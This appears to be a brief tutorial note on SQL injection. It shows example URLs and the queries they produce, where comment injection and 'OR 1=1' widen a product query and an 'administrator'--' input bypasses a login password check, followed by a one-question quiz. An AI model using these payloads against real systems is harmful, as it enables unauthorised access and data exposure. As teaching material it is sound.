minte9
LearnRemember / SECURITY



Interfere

An attacker may interfere with the queries. 
 
# Use comment to remove the remainder of the query

https://insecure-website.com/products?category=Gifts
# SELECT * FROM products WHERE category = 'Gifts' AND released = 1

https://insecure-website.com/products?category=Gifts'--
# SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1

https://insecure-website.com/products?category=Gifts'+OR+1=1--
# SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1

Bypass

An attacker can log in as any user without a password. 
 
# SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'
# SELECT * FROM users WHERE username = 'administrator'--' AND password = ''






Questions and answers




To comment a SQL query use:

  • a) double dash --
  • b) closing apostrophe '


References





Connected Graph